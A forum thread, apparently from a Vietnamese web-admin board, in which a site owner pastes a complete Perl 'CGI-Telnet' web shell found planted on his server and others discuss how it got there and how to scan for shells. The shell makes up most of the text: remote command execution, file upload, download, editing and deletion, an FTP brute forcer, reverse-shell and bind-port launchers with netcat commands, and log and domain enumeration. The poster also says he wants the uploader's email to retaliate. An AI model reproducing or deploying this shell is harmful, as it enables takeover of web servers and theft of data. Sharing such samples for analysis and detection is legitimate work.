Help Shell ?

Discussion in 'Installation, Upgrade, and Import Support' started by dakhucquan.net, 11/12/2017.

  1. dakhucquan.net

    Is there any way to find the email of the guy who uploaded this shell, folks?
    It's just a crappy little website, and I have no idea why he planted it there.

    Code:
    #!/usr/bin/perl -I/usr/local/bandmin
    use MIME::Base64;
    $Version= "CGI-Telnet Version 1.3";
    $EditPersion="MIsss";
    
    $Password = "svn";            # Change this. You will need to enter this
                    # to login.
    sub Is_Win(){
        $os = &trim($ENV{"SERVER_SOFTWARE"});
        if($os =~ m/win/i){
            return 1;
        }
        else{
            return 0;
        }
    }
    $WinNT = &Is_Win();                # You need to change the value of this to 1 if
                                    # you're running this script on a Windows NT
                                    # machine. If you're running it on Unix, you
                                    # can leave the value as it is.
    
    $NTCmdSep = "&";                # This character is used to seperate 2 commands
                                    # in a command line on Windows NT.
    
    $UnixCmdSep = ";";                # This character is used to seperate 2 commands
                                    # in a command line on Unix.
    
    $CommandTimeoutDuration = 10000;    # Time in seconds after commands will be killed
                                    # Don't set this to a very large value. This is
                                    # useful for commands that may hang or that
                                    # take very long to execute, like "find /".
                                    # This is valid only on Unix servers. It is
                                    # ignored on NT Servers.
    
    $ShowDynamicOutput = 1;            # If this is 1, then data is sent to the
                                    # browser as soon as it is output, otherwise
                                    # it is buffered and send when the command
                                    # completes. This is useful for commands like
                                    # ping, so that you can see the output as it
                                    # is being generated.
    
    # DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
    
    $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
    $CmdPwd = ($WinNT ? "cd" : "pwd");
    $PathSep = ($WinNT ? "\\" : "/");
    $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
    $cols= 150;
    $rows= 26;
    #------------------------------------------------------------------------------
    # Reads the input sent by the browser and parses the input variables. It
    # parses GET, POST and multipart/form-data that is used for uploading files.
    # The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
    # Other variables can be accessed using $in{'var'}, where var is the name of
    # the variable. Note: Most of the code in this function is taken from other CGI
    # scripts.
    #------------------------------------------------------------------------------
    sub ReadParse
    {
        local (*in) = @_ if @_;
        local ($i, $loc, $key, $val);
    
        $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
    
        if($ENV{'REQUEST_METHOD'} eq "GET")
        {
            $in = $ENV{'QUERY_STRING'};
        }
        elsif($ENV{'REQUEST_METHOD'} eq "POST")
        {
            binmode(STDIN) if $MultipartFormData & $WinNT;
            read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
        }
    
        # handle file upload data
        if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
        {
            $Boundary = '--'.$1; # please refer to RFC1867
            @list = split(/$Boundary/, $in);
            $HeaderBody = $list[1];
            $HeaderBody =~ /\r\n\r\n|\n\n/;
            $Header = $`;
            $Body = $';
             $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
            $in{'filedata'} = $Body;
            $Header =~ /filename=\"(.+)\"/;
            $in{'f'} = $1;
            $in{'f'} =~ s/\"//g;
            $in{'f'} =~ s/\s//g;
    
            # parse trailer
            for($i=2; $list[$i]; $i++)
            {
                $list[$i] =~ s/^.+name=$//;
                $list[$i] =~ /\"(\w+)\"/;
                $key = $1;
                $val = $';
                $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
                $val =~ s/%(..)/pack("c", hex($1))/ge;
                $in{$key} = $val;
            }
        }
        else # standard post data (url encoded, not multipart)
        {
            @in = split(/&/, $in);
            foreach $i (0 .. $#in)
            {
                $in[$i] =~ s/\+/ /g;
                ($key, $val) = split(/=/, $in[$i], 2);
                $key =~ s/%(..)/pack("c", hex($1))/ge;
                $val =~ s/%(..)/pack("c", hex($1))/ge;
                $in{$key} .= "\0" if (defined($in{$key}));
                $in{$key} .= $val;
            }
        }
    }
    
    #------------------------------------------------------------------------------
    # Prints the HTML Page Header
    # Argument 1: Form item name to which focus should be set
    #------------------------------------------------------------------------------
    sub PrintPageHeader
    {
        $EncodedCurrentDir = $CurrentDir;
        $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
        my $dir =$CurrentDir;
        $dir=~ s/\\/\\\\/g;
        print "Content-type: text/html\n\n";
        print <
    
    
    Edit by MIsss
    
    $HtmlMetaHeader
    
    
    
    
    
    
    $EditPersion $ENV{"SERVER_SOFTWARE"} Server IP: $ENV{'SERVER_ADDR'} | Your IP: $ENV{'REMOTE_ADDR'}
    Home | Command | GUI | Upload File | Download File | Back & Bind | Brute Forcer | Check Log | Domains/Users | Logout | Help
    END } #------------------------------------------------------------------------------ # Prints the Login Screen #------------------------------------------------------------------------------ sub PrintLoginScreen { print <
    
    
    Copyright (C) 2001 Rohitab Batra

    Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Trying connect to Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    ~\$ Connected !
    $ServerName~ Checking Server . . . . . . . . . . . . . . . . . . .
    $ServerName~ Trying connect to Command . . . . . . . . . . .
    $ServerName~\$ Connected Command!
    $ServerName~\$ OK! You can kill it!


    END } #------------------------------------------------------------------------------ # Add html special chars #------------------------------------------------------------------------------ sub HtmlSpecialChars($){ my $text = shift; $text =~ s/&/&/g; $text =~ s/"/"/g; $text =~ s/'/'/g; $text =~ s//>/g; return $text; } #------------------------------------------------------------------------------ # Add link for directory #------------------------------------------------------------------------------ sub AddLinkDir($) { my $ac=shift; my @dir=(); if($WinNT) { @dir=split(/\\/,$CurrentDir); }else { @dir=split("/",&trim($CurrentDir)); } my $path=""; my $result=""; foreach (@dir) { $path .= $_.$PathSep; $result.="".$_.$PathSep.""; } return $result; } #------------------------------------------------------------------------------ # Prints the message that informs the user of a failed login #------------------------------------------------------------------------------ sub PrintLoginFailedMessage { print <
    Login : Administrator
    Password:
    Login incorrect

    END } #------------------------------------------------------------------------------ # Prints the HTML form for logging in #------------------------------------------------------------------------------ sub PrintLoginForm { print < Login : Administrator
    Password: END } #------------------------------------------------------------------------------ # Prints the footer for the HTML Page #------------------------------------------------------------------------------ sub PrintPageFooter { print "
    o---[ Edit by $EditPersion ]---o
    "; } #------------------------------------------------------------------------------ # Retreives the values of all cookies. The cookies can be accesses using the # variable $Cookies{''} #------------------------------------------------------------------------------ sub GetCookies { @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'}); foreach $cookie(@httpcookies) { ($id, $val) = split(/=/, $cookie); $Cookies{$id} = $val; } } #------------------------------------------------------------------------------ # Prints the screen when the user logs out #------------------------------------------------------------------------------ sub PrintLogoutScreen { print "Connection closed by foreign host.

    "; } #------------------------------------------------------------------------------ # Logs out the user and allows the user to login again #------------------------------------------------------------------------------ sub PerformLogout { print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie &PrintPageHeader("p"); &PrintLogoutScreen; &PrintLoginScreen; &PrintLoginForm; &PrintPageFooter; exit; } #------------------------------------------------------------------------------ # This function is called to login the user. If the password matches, it # displays a page that allows the user to run commands. If the password doens't # match or if no password is entered, it displays a form that allows the user # to login #------------------------------------------------------------------------------ sub PerformLogin { if($LoginPassword eq $Password) # password matched { print "Set-Cookie: SAVEDPWD=$LoginPassword;\n"; &PrintPageHeader; print &ListDir; } else # password didn't match { &PrintPageHeader("p"); &PrintLoginScreen; if($LoginPassword ne "") # some password was entered { &PrintLoginFailedMessage; } &PrintLoginForm; &PrintPageFooter; exit; } } #------------------------------------------------------------------------------ # Prints the HTML form that allows the user to enter commands #------------------------------------------------------------------------------ sub PrintCommandLineInputForm { my $dir= "".&AddLinkDir("command").""; $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; return <
    $Prompt
    END } #------------------------------------------------------------------------------ # Prints the HTML form that allows the user to download files #------------------------------------------------------------------------------ sub PrintFileDownloadForm { my $dir = &AddLinkDir("download"); $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; return <
    $Prompt download

    Filename:

    Download:
    END } #------------------------------------------------------------------------------ # Prints the HTML form that allows the user to upload files #------------------------------------------------------------------------------ sub PrintFileUploadForm { my $dir= &AddLinkDir("upload"); $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; return <
    $Prompt upload

    Filename:

    Options:  

    Upload:   
    END } #------------------------------------------------------------------------------ # This function is called when the timeout for a command expires. We need to # terminate the script immediately. This function is valid only on Unix. It is # never called when the script is running on NT. #------------------------------------------------------------------------------ sub CommandTimeout { if(!$WinNT) { alarm(0); return <
    Command exceeded maximum time of $CommandTimeoutDuration second(s).
    Killed it! END } } #------------------------------------------------------------------------------ # This function displays the page that contains a link which allows the user # to download the specified file. The page also contains a auto-refresh # feature that starts the download automatically. # Argument 1: Fully qualified filename of the file to be downloaded #------------------------------------------------------------------------------ sub PrintDownloadLinkPage { local($FileUrl) = @_; my $result=""; if(-e $FileUrl) # if the file exists { # encode the file link so we can send it to the browser $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg; $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go"; $HtmlMetaHeader = ""; &PrintPageHeader("c"); $result .= <
    If the download does not start automatically, Click Here END $result .= &PrintCommandLineInputForm; } else # file doesn't exist { $result .= "Failed to download $FileUrl: $!"; $result .= &PrintFileDownloadForm; } return $result; } #------------------------------------------------------------------------------ # This function reads the specified file from the disk and sends it to the # browser, so that it can be downloaded by the user. # Argument 1: Fully qualified pathname of the file to be sent. #------------------------------------------------------------------------------ sub SendFileToBrowser { my $result = ""; local($SendFile) = @_; if(open(SENDFILE, $SendFile)) # file opened for reading { if($WinNT) { binmode(SENDFILE); binmode(STDOUT); } $FileSize = (stat($SendFile))[7]; ($Filename = $SendFile) =~ m!([^/^\\]*)$!; print "Content-Type: application/x-unknown\n"; print "Content-Length: $FileSize\n"; print "Content-Disposition: attachment; filename=$1\n\n"; print while(); close(SENDFILE); exit(1); } else # failed to open file { $result .= "Failed to download $SendFile: $!"; $result .=&PrintFileDownloadForm; } return $result; } #------------------------------------------------------------------------------ # This function is called when the user downloads a file. It displays a message # to the user and provides a link through which the file can be downloaded. # This function is also called when the user clicks on that link. In this case, # the file is read and sent to the browser. 
#------------------------------------------------------------------------------ sub BeginDownload { # get fully qualified path of the file to be downloaded if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute { $TargetFile = $TransferFile; } else # path is relative { chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/; $TargetFile .= $PathSep.$TransferFile; } if($Options eq "go") # we have to send the file { &SendFileToBrowser($TargetFile); } else # we have to send only the link page { &PrintDownloadLinkPage($TargetFile); } } #------------------------------------------------------------------------------ # This function is called when the user wants to upload a file. If the # file is not specified, it displays a form allowing the user to specify a # file, otherwise it starts the upload process. #------------------------------------------------------------------------------ sub UploadFile { # if no file is specified, print the upload form again if($TransferFile eq "") { return &PrintFileUploadForm; } my $result=""; # start the uploading process $result .= "Uploading $TransferFile to $CurrentDir...
    "; # get the fullly qualified pathname of the file to be created chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/; $TransferFile =~ m!([^/^\\]*)$!; $TargetName .= $PathSep.$1; $TargetFileSize = length($in{'filedata'}); # if the file exists and we are not supposed to overwrite it if(-e $TargetName && $Options ne "overwrite") { $result .= "Failed: Destination file already exists.
    "; } else # file is not present { if(open(UPLOADFILE, ">$TargetName")) { binmode(UPLOADFILE) if $WinNT; print UPLOADFILE $in{'filedata'}; close(UPLOADFILE); $result .= "Transfered $TargetFileSize Bytes.
    "; $result .= "File Path: $TargetName
    "; } else { $result .= "Failed: $!
    "; } } $result .= &PrintCommandLineInputForm; return $result; } #------------------------------------------------------------------------------ # This function is called when the user wants to download a file. If the # filename is not specified, it displays a form allowing the user to specify a # file, otherwise it displays a message to the user and provides a link # through which the file can be downloaded. #------------------------------------------------------------------------------ sub DownloadFile { # if no file is specified, print the download form again if($TransferFile eq "") { &PrintPageHeader("f"); return &PrintFileDownloadForm; } # get fully qualified path of the file to be downloaded if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute { $TargetFile = $TransferFile; } else # path is relative { chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/; $TargetFile .= $PathSep.$TransferFile; } if($Options eq "go") # we have to send the file { return &SendFileToBrowser($TargetFile); } else # we have to send only the link page { return &PrintDownloadLinkPage($TargetFile); } } #------------------------------------------------------------------------------ # This function is called to execute commands. It displays the output of the # command and allows the user to enter another command. The change directory # command is handled differently. In this case, the new directory is stored in # an internal variable and is used each time a command has to be executed. The # output of the change directory command is not displayed to the users # therefore error messages cannot be displayed. #------------------------------------------------------------------------------ sub ExecuteCommand { my $result=""; if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command { # we change the directory internally. The output of the # command is not displayed. 
$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd; chop($CurrentDir = `$Command`); $result .= &PrintCommandLineInputForm; $result .= "Command: $RunCommand
    "; return $result; } #------------------------------------------------------------------------ # run command #------------------------------------------------------------------------ sub RunCmd { my $result=""; $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector; if(!$WinNT) { $SIG{'ALRM'} = \&CommandTimeout; alarm($CommandTimeoutDuration); } if($ShowDynamicOutput) # show output as it is generated { $|=1; $Command .= " |"; open(CommandOutput, $Command); while() { $_ =~ s/(\n|\r\n)$//; $result .= &HtmlSpecialChars("$_\n"); } $|=0; } else # show output after command completes { $result .= &HtmlSpecialChars('$Command'); } if(!$WinNT) { alarm(0); } return $result; } #============================================================================== # Form Save File #============================================================================== sub SaveFileForm { my $result =""; substr($RunCommand,0,5)=""; my $file=&trim($RunCommand); $save='
    '; $File=$CurrentDir.$PathSep.$RunCommand; my $dir="".&AddLinkDir("gui").""; if(-w $File) { $rows="23" }else { $msg="
    Permission denied!
    "; $rows="20" } $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; $read=($WinNT)?"type":"less"; $RunCommand = "$read \"$RunCommand\""; $result .= <
    $Prompt
    Command: $RunCommand $save
    $msg
    "; $result .= "
    "; return $result; } #============================================================================== # Save File #============================================================================== sub SaveFile($) { my $Data= shift ; my $File= shift; $File=$CurrentDir.$PathSep.$File; if(open(FILE, ">$File")) { binmode FILE; print FILE $Data; close FILE; return 1; }else { return 0; } } #------------------------------------------------------------------------------ # Brute Forcer Form #------------------------------------------------------------------------------ sub BruteForcerForm { my $result=""; $result .= <
    ####################################
    Simple FTP brute forcer
    ####################################
    User:
    Pass:
    Sleep:
END return $result; } #------------------------------------------------------------------------------ # Brute Forcer #------------------------------------------------------------------------------ sub BruteForcer { my $result=""; $Server=$ENV{'SERVER_ADDR'}; if($in{'user'} eq "") { $result .= &BruteForcerForm; }else { use Net::FTP; @user= split(/\n/, $in{'user'}); @pass= split(/\n/, $in{'pass'}); chomp(@user); chomp(@pass); $result .= "

[+] Trying brute $ServerName
====================>>>>>>>>>>>><<<<<<<<<<====================

\n"; foreach $username (@user) { if(!($username eq "")) { foreach $password (@pass) { $ftp = Net::FTP->new($Server) or die "Could not connect to $ServerName\n"; if($ftp->login("$username","$password")) { $result .= "[+] ftp://$username:$password\@$Server
\n"; $ftp->quit(); break; } if(!($in{'sleep'} eq "0")) { sleep(int($in{'sleep'})); } $ftp->quit(); } } } $result .= "\n
==========>>>>>>>>>> Finished <<<<<<<<<<==========
\n"; } return $result; } #------------------------------------------------------------------------------ # Backconnect Form #------------------------------------------------------------------------------ sub BackBindForm { return <

BackConnect: Host: Port:
[+] Client listen before connect back!
[+] Try check your Port with http://www.canyouseeme.org/
[+] Client listen with command: nc -vv -l -p 80


Bind Port: Port: Password:
[+] Chuc nang chua dc test!
[+] Try command: nc $ENV{'SERVER_ADDR'} 1412

END } #------------------------------------------------------------------------------ # Backconnect use perl #------------------------------------------------------------------------------ sub BackBind { use MIME::Base64; use Socket; $backperl="[base64 payload removed]"; $bindperl="[base64 payload removed]"; $ClientAddr = $in{'clientaddr'}; $ClientPort = int($in{'clientport'}); if($ClientPort eq 0) { return &BackBindForm; }elsif(!$ClientAddr eq "") { $Data=decode_base64($backperl); if(-w "/tmp/") { $File="/tmp/backconnect.pl"; }else { $File=$CurrentDir.$PathSep."backconnect.pl"; } open(FILE, ">$File"); print FILE $Data; close FILE; system("perl backconnect.pl $ClientAddr $ClientPort"); unlink($File); exit 0; }else { $Data=decode_base64($bindperl); if(-w "/tmp") { $File="/tmp/bindport.pl"; }else { $File=$CurrentDir.$PathSep."bindport.pl"; } open(FILE, ">$File"); print FILE $Data; close FILE; system("perl bindport.pl $ClientPort"); unlink($File); exit 0; } } 
#------------------------------------------------------------------------------ # Array List Directory #------------------------------------------------------------------------------ sub RmDir($) { my $dir = shift; if(opendir(DIR,$dir)) { while($file = readdir(DIR)) { if(($file ne ".") && ($file ne "..")) { $file= $dir.$PathSep.$file; if(-d $file) { &RmDir($file); } else { unlink($file); } } } closedir(DIR); } if(!rmdir($dir)) { } } sub FileOwner($) { my $file = shift; if(-e $file) { ($uid,$gid) = (stat($file))[4,5]; if($WinNT) { return "???"; } else { $name=getpwuid($uid); $group=getgrgid($gid); return $name."/".$group; } } return "???"; } sub ParentFolder($) { my $path = shift; my $Comm = "cd \"$CurrentDir\"".$CmdSep."cd ..".$CmdSep.$CmdPwd; chop($path = `$Comm`); return $path; } sub FilePerms($) { my $file = shift; my $ur = "-"; my $uw = "-"; if(-e $file) { if($WinNT) { if(-r $file){ $ur = "r"; } if(-w $file){ $uw = "w"; } return $ur . " / " . $uw; }else { $mode=(stat($file))[2]; $result = sprintf("%04o", $mode & 07777); return $result; } } return "0000"; } sub FileLastModified($) { my $file = shift; if(-e $file) { ($la) = (stat($file))[9]; ($d,$m,$y,$h,$i) = (localtime($la))[3,4,5,2,1]; $y = $y + 1900; @month = qw/1 2 3 4 5 6 7 8 9 10 11 12/; $lmtime = sprintf("%02d/%s/%4d %02d:%02d",$d,$month[$m],$y,$h,$i); return $lmtime; } return "???"; } sub FileSize($) { my $file = shift; if(-f $file) { return -s $file; } return "0"; } sub ParseFileSize($) { my $size = shift; if($size <= 1024) { return $size. " B"; } else { if($size <= 1024*1024) { $size = sprintf("%.02f",$size / 1024); return $size." KB"; } else { $size = sprintf("%.2f",$size / 1024 / 1024); return $size." MB"; } } } sub trim($) { my $string = shift; $string =~ s/^\s+//; $string =~ s/\s+$//; return $string; } sub AddSlashes($) { my $string = shift; $string=~ s/\\/\\\\/g; return $string; } sub ListDir { my $path = $CurrentDir.$PathSep; $path=~ s/\\\\/\\/g; my $result = "
Path: [ ".&AddLinkDir("gui")." ]
"; if(-d $path) { my @fname = (); my @dname = (); if(opendir(DIR,$path)) { while($file = readdir(DIR)) { $f=$path.$file; if(-d $f) { push(@dname,$file); } else { push(@fname,$file); } } closedir(DIR); } @fname = sort { lc($a) cmp lc($b) } @fname; @dname = sort { lc($a) cmp lc($b) } @dname; $result .= "
"; my $style="line"; my $i=0; foreach my $d (@dname) { $style= ($style eq "line") ? "notline": "line"; $d = &trim($d); $dirname=$d; if($d eq "..") { $d = &ParentFolder($path); } elsif($d eq ".") { $d = $path; } else { $d = $path.$d; } $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $i++; } foreach my $f (@fname) { $style= ($style eq "line") ? "notline": "line"; $file=$f; $f = $path.$f; $view = "?dir=".$path."&view=".$f; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $i++; } $result .= "
File Name File Size Owner Permission Last Modified Action
[ ".$dirname." ]DIR".&FileOwner($d)."".&FilePerms($d)."".&FileLastModified($d)."Rename | Remove
".$file."".&ParseFileSize(&FileSize($f))."".&FileOwner($f)."".&FilePerms($f)."".&FileLastModified($f)."Edit | Rename | Download | Remove
"; } return $result; } #------------------------------------------------------------------------------ # Try to View List User #------------------------------------------------------------------------------ sub ViewDomainUser { open (domains, '/etc/named.conf') or $err=1; my @cnzs = ; close d0mains; my $style="line"; my $result="
Hoang Sa - Truong Sa
"; if ($err) { $result .= ('

C0uldn\'t Bypass it , Sorry

'); return $result; }else { $result .= ''; } foreach my $one (@cnzs) { if($one =~ m/.*?zone "(.*?)" {/) { $style= ($style eq "line") ? "notline": "line"; $filename= "/etc/valiases/".$one; $owner = getpwuid((stat($filename))[4]); $result .= ''; } } $result .= '
Domains User
'.$one.' '.$owner.'
'; return $result; } #------------------------------------------------------------------------------ # View Log #------------------------------------------------------------------------------ sub ViewLog { if($WinNT) { return "

Don't run on Windows

"; } my $result=""; my @pathlog=( '/usr/local/apache/logs/error_log', '/var/log/httpd/error_log', '/usr/local/apache/logs/access_log' ); my $i=0; my $perms; my $sl; foreach my $log (@pathlog) { if(-w $log) { $perms="OK"; }else { chop($sl = `ln -s $log error_log_$i`); if(&trim($ls) eq "") { if(-r $ls) { $perms="OK"; $log="error_log_".$i; } }else { $perms="Cancel"; } } $result .=< END $i++; } $result .="
Path LogSubmit
$perms
"; return $result; } #------------------------------------------------------------------------------ # Main Program - Execution Starts Here #------------------------------------------------------------------------------ &ReadParse; &GetCookies; $ScriptLocation = $ENV{'SCRIPT_NAME'}; $ServerName = $ENV{'SERVER_NAME'}; $LoginPassword = $in{'p'}; $RunCommand = $in{'c'}; $TransferFile = $in{'f'}; $Options = $in{'o'}; $Action = $in{'a'}; $Action = "command" if($Action eq ""); # no action specified, use default # get the directory in which the commands will be executed $CurrentDir = &trim($in{'d'}); # mac dinh xuat thong tin neu ko co lenh nao! $RunCommand= $WinNT?"dir":"dir -lia" if($RunCommand eq ""); chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq ""); $LoggedIn = $Cookies{'SAVEDPWD'} eq $Password; if($Action eq "login" || !$LoggedIn) # user needs/has to login { &PerformLogin; }elsif($Action eq "gui") # GUI directory { &PrintPageHeader; if(!$WinNT) { $chmod=int($in{'chmod'}); if(!($chmod eq 0)) { $chmod=int($in{'chmod'}); $file=$CurrentDir.$PathSep.$TransferFile; chop($result= `chmod $chmod "$file"`); if(&trim($result) eq "") { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } } } $rename=$in{'rename'}; if(!$rename eq "") { if(rename($TransferFile,$rename)) { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } } $remove=$in{'remove'}; if($remove ne "") { $rm = $CurrentDir.$PathSep.$remove; if(-d $rm) { &RmDir($rm); }else { if(unlink($rm)) { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } } } print &ListDir; } elsif($Action eq "command") # user wants to run a command { &PrintPageHeader("c"); print &ExecuteCommand; } elsif($Action eq "save") # user wants to save a file { &PrintPageHeader; if(&SaveFile($in{'data'},$in{'file'})) { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } print &ListDir; } elsif($Action eq "upload") # user wants to upload a file { &PrintPageHeader; print &UploadFile; } elsif($Action eq "backbind") # user wants to back connect or bind port { &PrintPageHeader("clientport"); print &BackBind; } elsif($Action eq "bruteforcer") # user wants to brute force { &PrintPageHeader; print &BruteForcer; }elsif($Action eq "download") # user wants to download a file { print &DownloadFile; }elsif($Action eq "checklog") # user wants to view log file { &PrintPageHeader; print &ViewLog; }elsif($Action eq "domainsuser") # user wants to view list user/domain { &PrintPageHeader; print &ViewDomainUser; }elsif($Action eq "logout") # user wants to logout { &PerformLogout; } &PrintPageFooter;
 
Last edited: 11/12/2017
THB likes this.
  • tuna

    How do you tell that you've been hit with a shell?

    THB likes this.
  • dakhucquan.net

    Scan.

    THB likes this.
  • THB

    @vanphu113, could you take a look at this one? I give up, hehe. My knowledge is limited.
     
  • ngaithon

    How do you scan? Could you share how to do the scan, please?

    THB likes this.
  • aviaiva

    When a code scan turns up Base64, people treat it as a shell in the code, but that is not always true. Everyone knows this by now, so only amateurs plant shells that way.
    If your site brings a hacker no profit, he won't bother breaking in, unless you invite him in yourself by using outside code, styles, or source code shared all over the internet.
    Honestly, it mostly comes down to trusting each other, plus being short of money and so taking the risk; hardly anyone running a forum fully understands the code.
    Best is to find a reputable forum such as vnxf to get styles, add-ons and Xen source code; if something does go wrong, the odds are still lower than on other sites.

    THB likes this.
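An added example (not part of any post in this thread, and not a tool the posters name): a small Python scanner illustrating the point above that a Base64 hit alone does not prove a shell. It scores each file on several constructs visible in the shell quoted in the first post, and lists symlinks that point outside the web root, like the `error_log_N` links that shell's log viewer creates. The indicator weights, the threshold and both sample files are constructed assumptions.

```python
import re
import tempfile
from pathlib import Path

# (name, pattern, weight). Patterns are constructs visible in the shell quoted
# in the first post; weights and threshold are illustrative assumptions.
INDICATORS = [
    ("base64_decode", re.compile(r"\b(?:decode_base64|base64_decode)\b"), 1),
    ("os_command", re.compile(r"\b(?:system|passthru|shell_exec)\s*\("), 2),
    ("backtick_variable", re.compile(r"`[^`\n]*\$\w+[^`\n]*`"), 2),
    ("password_cookie", re.compile(r"Set-Cookie:\s*SAVEDPWD"), 3),
    ("shell_banner", re.compile(r"CGI-Telnet", re.IGNORECASE), 3),
]
WEIGHTS = {name: weight for name, _, weight in INDICATORS}
THRESHOLD = 4          # a lone Base64 decode (weight 1) stays below this
MAX_BYTES = 1_000_000  # skip large binaries

# Constructed benign file: decodes an embedded image fragment, nothing else.
BENIGN_SAMPLE = r'''use MIME::Base64;
my $logo = decode_base64("iVBORw0KGgoAAAANSUhEUg==");
print "Content-Type: image/png\n\n", $logo;
'''

# Constructed sample made of isolated lines quoted from the first post.
SUSPICIOUS_SAMPLE = r'''use MIME::Base64;
$Version= "CGI-Telnet Version 1.3";
print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
$Data=decode_base64($bindperl);
system("perl bindport.pl $ClientPort");
chop($CurrentDir = `$CmdPwd`);
'''


def score_text(text):
    """Return (score, indicator names); each indicator counts once per file."""
    hits = [name for name, pattern, _ in INDICATORS if pattern.search(text)]
    return sum(WEIGHTS[name] for name in hits), hits


def scan_tree(root, threshold=THRESHOLD):
    """Score every regular file under root, whatever its extension."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_symlink() or not path.is_file():
            continue
        if path.stat().st_size > MAX_BYTES:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        score, hits = score_text(text)
        if score >= threshold:
            findings.append((path.relative_to(root).as_posix(), score, hits))
    return sorted(findings, key=lambda item: -item[1])


def find_escaping_symlinks(root):
    """List symlinks under root whose target resolves outside root."""
    root = Path(root).resolve()
    escaping = []
    for path in sorted(root.rglob("*")):
        if path.is_symlink():
            target = path.resolve()
            if target != root and root not in target.parents:
                escaping.append(path.relative_to(root).as_posix())
    return escaping


def demo():
    """Build a constructed web root in a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as web, tempfile.TemporaryDirectory() as outside:
        web = Path(web)
        (web / "library" / "deep").mkdir(parents=True)
        (web / "logo.pl").write_text(BENIGN_SAMPLE)
        (web / "library" / "deep" / "help.cgi").write_text(SUSPICIOUS_SAMPLE)
        target = Path(outside) / "error_log"
        target.write_text("constructed log line\n")
        (web / "error_log_0").symlink_to(target)
        return scan_tree(web), find_escaping_symlinks(web)


if __name__ == "__main__":
    flagged, links = demo()
    for name, score, hits in flagged:
        print(f"{score:3d}  {name}  {', '.join(hits)}")
    for name in links:
        print(f"symlink leaves web root: {name}")
```

A flagged file is a lead for manual review and for checking the server logs around its modification time, not a verdict.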
  • ngaithon

    I get everything from vnxf, and I still don't know whether I've been hit or not.

    THB likes this.
  • aviaiva

    Search with keywords like "virus scan for website", "check for shell in code" ... and follow along; you'll immediately see red or yellow warnings all over the code, but it's nothing to worry about.

    THB likes this.
  • xenmax

    With this shell, a hacker may be using your site to local-attack other sites on the same server. It could also be because you downloaded an add-on or style from junk sites; they plant shells in shared code.
    This "svn" password is the shell used by the sinhviennet guy; he used to specialize in hacking code and then selling it. It could also be someone else using this shell without changing the password.
     
    dakhucquan.net, THB and quick87 like this.
  • vanphu113

    Shells just get shared around online; you can't determine who is using one from the shell itself.
    For example, hvn's shell is reused by plenty of other people with the old info left intact, but it wasn't uploaded by hvn. So you need to check the server logs or ask the hosting provider to check. Most hosting servers now run CloudLinux, so a local attack is probably not very likely. It's just buggy code or the use of shared code.
    Just a few thoughts. @THB

    THB likes this.
  • dakhucquan.net

    Could someone decode it for me please :(, I want to find out the email so I can bomb the hell out of the guy who planted it on my host :((
    Attached below; anyone who wants to dig in can pull it down and poke around. It's the shell's full control panel.

    Last edited: 20/12/2017
    THB likes this.
  • dakhucquan.net

    So that's how it is, folks :))

    Last edited: 09/04/2020
  • dakhucquan.net

    I've wiped all the code and am waiting for the support guy to reinstall the host. I don't know whether he uploaded by hand or with tools, but there's a shell in every folder, folks.

    THB likes this.